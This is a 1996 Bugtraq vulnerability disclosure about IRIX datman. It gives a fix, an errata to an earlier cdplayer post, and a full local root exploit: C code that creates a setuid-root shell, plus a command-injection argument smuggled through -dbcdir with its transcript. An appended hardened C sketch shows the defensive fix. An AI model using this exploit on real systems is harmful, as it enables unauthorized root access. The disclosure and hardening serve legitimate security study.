Bugtraq mailing list archives
Irix: datman hole, errata
From: volobuev () t1 chem umn edu (Yuri Volobuev)
Date: Mon, 9 Dec 1996 16:07:38 -0600
Howdy,

ABSTRACT

/usr/sbin/datman, which is also invoked by running cdman, or by double-clicking on the cdrom icon on the desktop, is suid and buggy. It can be used by any local user to obtain root privileges (contrary to previously published information). Both Irix 5.3 and 6.2 are vulnerable if the dmedia_tools.sw.cddat subsystem is installed.

FIX

chmod -s /usr/sbin/datman

This will break it. Another approach is to create a special group, 'console' or something like it, which only includes trusted people who have physical access to the system and thus may need the functionality of cdman/datman, and only allow datman execution access to this group of trusted people, but not to everybody. This will reduce the risk, but as long as the program is root owned and suid, the vulnerability is there.

ERRATA

As some of you may remember, a few weeks ago I posted a cdplayer exploit on bugtraq. Among other things, it was saying

(it will break it, but it's no big deal, there's a program called cdman, usually invoked by double-clicking the CD ROM icon on the desktop, that does the same thing, only better, and it's not suid).

As some friendly fellow pointed out (sorry, I don't have his name, I lost that message), this is untrue. /usr/sbin/cdman is just a symlink to /usr/sbin/datman, which is indeed suid. And, of course, one can get root out of it, apparently with much less hassle than cdplayer; it was obvious from the very first look at the datman file size (803Kb), and from that moment on it was just a matter of time. I apologize for giving people a false feeling of safety (not that people should believe what I'm saying; but when what I'm saying is repeated by more trustworthy organizations like AUSCERT, it's more dangerous). If you are a busy person, move on to your next message now.

FULL STORY

I promised I'd stop cracking those defenseless suid programs (temporarily), but a few things made me step back onto the hacking path. Most significantly, this morning I came across AUSCERT advisory AA-96.11, which describes the cdplayer problem. I didn't know it was out. It essentially repeats my original post, but of course doesn't mention my name. It'd be all right, but what pisses me off is that they didn't even verify what I was saying. What kind of service is that? They charge people serious money for their services, and after that most of their advisories just paraphrase original exploits posted by other people, without giving them any credit, and they apparently don't even double-check the information in the posts. There are not so many easy (and legal) ways to make money as good as that. Do nothing, repost others' work, collect cash. Hey, AUSCERT, what makes you suggest cdman to people as a safer way to play cdroms? Did you check if it is safe? Did you spare half an hour to look through the executable to see that it's as broken as cdplayer? Too bad you didn't, half an hour would be sufficient.

/usr/sbin/datman is essentially a fatter, more featured version of cdplayer (or cdplayer is a stripped down datman, whatever). They do the same stuff in regard to cd-rom databases. However, datman calls setreuid(0, realuid) at the very beginning, so the uid stays 0, but the euid is whatever the user's uid is. Interesting idea; it works in the sense that all created files are owned by the user, but it doesn't help much otherwise. For backward compatibility reasons, upon startup datman looks for a file .cdplayerrc in the home directory. If it exists, and the directory ~/.cddb doesn't exist, it will ask if you want to convert .cdplayerrc to .cddb. If you answer yes, it will invoke /usr/sbin/cddbcvt, giving the old and new database names as arguments to it. Using system(). What more can be said?

% cat > /tmp/makesh.c
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    seteuid(0);
    setegid(0);
    system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");
    return 0;
}
% cc /tmp/makesh.c -o /tmp/makesh
% mv .cddb .cddb.old
% touch .cdplayerrc
% /usr/sbin/datman -dbcdir "/tmp/blah;/tmp/makesh"
Created "/tmp/blah"
Converting /home/medc2/yuri/.cdplayerrc into /tmp/blah
% ls -l /tmp/sh
-r-sr-sr-x    1 root     sys       140784 Dec  9 15:24 /tmp/sh*

In the above example, a few dialog windows will pop up after starting datman. Just press enter in each of them. Make sure your DISPLAY is set correctly. Note that though you can pass arbitrary shell commands to sh in -dbcdir, these commands will be executed with the euid set to your uid, so seteuid(0) needs to be called first.

A note to security folks everywhere. People. Why do you all ignore hackers? Why try to keep face and pretend hackers are not out there? Why don't you give them credit for their work? Why don't you cooperate with them? One may say that hackers are bad people, and don't deserve any recognition. This is wrong. Predators in nature represent a vital part of the environment. They serve many vital purposes; most importantly, they keep natural selection going. By killing the weak they make animals get stronger and faster. This doesn't mean a zebra should like the lioness that killed it. But nevertheless, the overall zebra community should be thankful for the fact that lions exist.

Hackers are predators in the computer world, often ruthless and extremely dangerous. But the very fact that they are out there makes an entire branch of the computer industry, computer security, exist. Hackers make developers design their programs better, and after all they are the reason why the modern computer world is as secure as it is (whatever this means). But even though developers have each and every right to hate hackers, why do security folks dislike them? These people are getting paid because of hackers, hackers are the very reason for their positions' existence, and still only a few smarter vendors have enough sense to at least admit the problem disclosed by a hacker. This is very sad. Not only is it disappointing, it ultimately may lead to some BAD things.

This exploit is dedicated to AUSCERT.

cheers,
yuri

Always speaking for myself and only for myself
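The datman design described above (setreuid(0, realuid), which keeps root one seteuid(0) away, followed by system() on a user-supplied -dbcdir string) is the pattern a defender wants reversed. As an added example, not part of Yuri's post or of SGI's code, here is a hypothetical hardened sketch in C: it validates the directory argument, drops root irrevocably with setgid/setuid, and execs the helper (a placeholder path standing in for /usr/sbin/cddbcvt) without any shell in between.

```c
#define _GNU_SOURCE
#include <ctype.h>
#include <grp.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical hardened sketch (not SGI's datman code). A setuid program that
 * spawns a helper on a user-supplied path should refuse shell metacharacters,
 * give up root for good, and exec the helper directly instead of via system(). */

/* 1 if dir is an absolute path with no shell metacharacters or "..", else 0. */
int is_safe_dbdir(const char *dir)
{
    const char *meta = ";|&$`\"'\\<>(){}[]*?!~#";
    if (dir == NULL || dir[0] != '/' || strlen(dir) >= 1024 || strstr(dir, ".."))
        return 0;
    for (const char *p = dir; *p; p++)
        if (strchr(meta, *p) || !isgraph((unsigned char)*p))
            return 0;
    return 1;
}

/* Become the real user irrevocably. datman's setreuid(0, realuid) leaves the
 * real uid 0, so seteuid(0) gets root back; setgid/setuid discard it for good. */
int drop_privileges_permanently(void)
{
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (geteuid() == 0 && setgroups(0, NULL) != 0) return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0) return -1;
    if (uid != 0 && (setuid(0) == 0 || seteuid(0) == 0)) return -1; /* must fail */
    return 0;
}

/* Fork, drop root in the child, execv the helper with argv words: no shell ever
 * parses newdir. Returns the helper's exit status, 127 if exec failed, and -1 if
 * the argument was rejected or the spawn itself failed. */
int run_converter(const char *helper, const char *oldrc, const char *newdir)
{
    if (!is_safe_dbdir(newdir)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privileges_permanently() != 0) _exit(127);
        char *const argv[] = { (char *)helper, (char *)oldrc, (char *)newdir, NULL };
        execv(helper, argv);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

The "/tmp/blah;/tmp/makesh" argument from the transcript above is rejected before fork() is ever reached; with a shell removed from the path, even a metacharacter that slipped through the check would only be a directory name to execv.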